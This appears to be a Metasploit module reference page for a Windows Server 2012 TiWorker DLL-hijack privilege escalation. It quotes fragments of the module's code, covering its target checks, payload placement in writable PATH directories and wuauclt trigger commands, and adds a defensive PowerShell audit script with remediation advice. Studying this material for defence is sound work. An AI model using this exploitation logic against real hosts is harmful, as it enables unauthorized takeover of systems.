      return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
    end
Received unexpected reply when trying to obtain the Windows Update setting.
Here is a relevant code snippet related to the "Received unexpected reply when trying to obtain the Windows Update setting." error message:
      # if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
      return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
    end

    unless (1..4).include?(@wupdate_setting)
      return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
    end

    # get groups for the current user, this is necessary to verify write permissions
    current_user = session.sys.config.getuid
    user_groups = grab_user_groups(current_user)
Session is already elevated
Here is a relevant code snippet related to the "Session is already elevated" error message:
    return Exploit::CheckCode::Appears
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    payload_arch = payload.arch.first
    if (payload_arch != ARCH_X64)
      fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported.
Here is a relevant code snippet related to the "Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported." error message:
      fail_with(Failure::None, 'Session is already elevated')
    end

    payload_arch = payload.arch.first
    if (payload_arch != ARCH_X64)
      fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
    end

    # check if TiWorker.exe is already running, in which case exploitation will fail
    host_processes = client.sys.process.get_processes
    if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.
Here is a relevant code snippet related to the "TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish." error message:

    # check if TiWorker.exe is already running, in which case exploitation will fail
    host_processes = client.sys.process.get_processes
    if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
      unless wait_for_tiworker > 0
        fail_with(Failure::Unknown, 'TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.')
      end

      monitor_tiworker
    end

Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
Here is a relevant code snippet related to the "Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target." error message:
    ## 'wuauclt /selfupdateunmanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the Windows Update site. This is not stealthy, but works with all Windows Update settings.
    ## the module prefers /selfupdatemanaged over /selfupdateunmanaged when /detectnow is not possible because /selfupdateunmanaged may require the target to be able to reach the Windows Update server

    case @wupdate_setting
    when 1
      print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
      if stealth_only
        fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
        return
      end
      trigger_cmd = 'wuauclt /selfupdatemanaged'
Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.
Here is a relevant code snippet related to the "Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false." error message:

    case @wupdate_setting
    when 1
      print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
      if stealth_only
        fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
        return
      end
      trigger_cmd = 'wuauclt /selfupdatemanaged'
    when 2..4
      # trigger the payload in the background if we can
Windows Update is not configured or returned an unexpected value. Exploitation may not work.
Here is a relevant code snippet related to the "Windows Update is not configured or returned an unexpected value. Exploitation may not work." error message:
    when 2..4
      # trigger the payload in the background if we can
      trigger_cmd = 'wuauclt /detectnow'
    else
      # if this is true, ForceExploit has been set and we should just roll with it
      print_warning('Windows Update is not configured or returned an unexpected value. Exploitation may not work.')
      if stealth_only
        trigger_cmd = 'wuauclt /detectnow'
      else
        # go out guns blazing and hope for the best
        print_status('The module will launch the Windows Update window on the target in an attempt to trigger the payload.')
Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.
Here is a relevant code snippet related to the "Using ForceExploit requires `WRITABLE_PATH_DIR` to be set." error message:
    end

    # select a target directory to write the payload to
    if @writable_path_dirs.empty? # this means ForceExploit is being used
      if provided_path_dir.blank?
        fail_with(Failure::BadConfig, 'Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.')
      end

      dll_path = provided_path_dir
    else
      dll_path = @writable_path_dirs[0]
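The module's check logic above combines three host conditions: the OS is Windows Server 2012 (not R2), Windows Update has been configured (AUOptions present), and some directory in %PATH% is writable by a low-privileged user. The script below is an added example for defenders, written for this page and not part of the Metasploit module, that reports the same three conditions from inside the host so an administrator can confirm or remove the exposure. It assumes an elevated PowerShell session on an English-locale host; the list of "broad" principals and the right bits it treats as file-creation rights are choices made for this example.

```powershell
# Added example (not part of the module): report, from the host side, the conditions
# the module's check() looks for. Run in an elevated PowerShell session.

# 1. OS check: Windows Server 2012 but not 2012 R2
$os = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
$is2012 = ($os -like '*2012*') -and ($os -notlike '*R2*')
"OS: $os (Windows Server 2012 non-R2: $is2012)"

# 2. Windows Update configuration: the same AUOptions value the module reads
$auKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update'
$auOptions = (Get-ItemProperty -Path $auKey -Name AUOptions -ErrorAction SilentlyContinue).AUOptions
if ($null -eq $auOptions) {
    'AUOptions: not set (Windows Update has never been configured)'
} else {
    "AUOptions: $auOptions (1 = never check; 2-4 = configured)"
}

# 3. Machine-scope PATH directories where broad low-privileged principals can create files.
#    TiWorker.exe runs as SYSTEM, so the machine PATH is the one that matters.
#    Assumption: English builtin group names; adjust for localized builds.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Creating a file needs the CreateFiles/WriteData bit (0x2); some ACEs instead carry the
# unexpanded generic bits GENERIC_WRITE (0x40000000) or GENERIC_ALL (0x10000000).
$createFilesBit = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
$genericWrite = 0x40000000
$genericAll   = 0x10000000

$findings = foreach ($dir in ([Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';')) {
    $dir = $dir.Trim()
    if (-not $dir) { continue }
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        # A PATH entry that does not exist deserves a look as well: if its parent
        # directory is writable, a user can create it.
        Write-Warning "PATH entry does not exist: $dir"
        continue
    }
    $acl = Get-Acl -LiteralPath $dir
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($broadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        $canCreate = (($rights -band $createFilesBit) -ne 0) -or
                     (($rights -band $genericWrite) -ne 0) -or
                     (($rights -band $genericAll) -ne 0)
        if ($canCreate) {
            [pscustomobject]@{
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

if ($findings) {
    'Machine PATH directories that grant file creation to low-privileged principals:'
    $findings | Format-Table -AutoSize
} else {
    'No machine PATH directory grants file creation to broad low-privileged principals.'
}
```

Any directory the script lists is the write location the module would pick. The fix on an affected 2012 host is to remove that directory from the machine PATH or tighten its ACL so only administrators and SYSTEM can create files there; the script only inspects the four listed principals, so a custom low-privileged group with write access would need to be added to `$broadPrincipals` to be reported.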
Related Pull Requests
- #15575 Merged Pull Request: Update Gemfile.lock
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in rename_file method
- #15540 Merged Pull Request: Add option for running cmd_execute in a subshell
- #15303 Merged Pull Request: Fix dir method for windows shell sessions
References
See Also
Check also the following modules related to this module:
- exploit/windows/local/dnsadmin_serverlevelplugindll
- exploit/windows/browser/juniper_sslvpn_ive_setupdll
- exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- exploit/windows/browser/webdav_dll_hijacker
- exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
- exploit/windows/fileformat/office_ole_multiple_dll_hijack
- exploit/windows/http/amlibweb_webquerydll_app
- exploit/windows/http/generic_http_dll_injection
- exploit/windows/iis/ms03_007_ntdll_webdav
- exploit/windows/misc/ibm_director_cim_dllinject
- exploit/windows/misc/vmhgfs_webdav_dll_sideload
- exploit/windows/smb/generic_smb_dll_injection
- exploit/windows/smb/ms10_046_shortcut_icon_dllloader
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
Authors
- Erik Wynter
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.